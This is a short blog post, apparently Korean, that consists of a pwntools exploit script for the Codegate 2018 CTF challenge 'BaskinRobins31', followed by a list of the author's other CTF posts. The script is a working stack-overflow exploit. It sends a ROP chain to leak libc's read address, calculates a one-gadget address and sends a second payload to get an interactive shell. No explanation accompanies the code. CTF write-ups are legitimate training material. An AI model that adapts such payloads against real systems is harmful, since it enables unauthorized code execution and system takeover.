# exploit.py


from pwn import *
from time import *

p = process('./BaskinRobins31')
#p = remote('ch41l3ng3s.codegate.kr', 3131)

sleep(0.3)
print p.recv(1024)

payload = str('3') + 'A'*183
payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0)
payload += p64(0x4008a4)

p.sendline(payload)

data = p.recv(1024)

read = u64(data[237:245])
libc = read - 0xf7250
oneshot = libc + 0x45216

log.info('read = ' + hex(read))
log.info('libc = ' + hex(libc))
log.info('oneshot = ' + hex(oneshot))

r_payload = 'A'*184
r_payload += p64(oneshot)

p.sendline(r_payload)

p.interactive()

 

'ctf' 카테고리의 다른 글

[Codegate 2018 CTF] Super Marimo  (0) 2018.02.08
[Codegate 2018 CTF] RedVelvet  (0) 2018.02.08
[Codegate 2018 CTF] BaskinRobins31  (0) 2018.02.08
[BKP 2016 CTF] cookbook  (0) 2017.06.01
[DEFCON 2017 CTF] beatmeonthedl  (0) 2017.05.09
[DEFCON 2017 CTF] smashme  (0) 2017.05.08
Posted by woodonggyu

댓글을 달아 주세요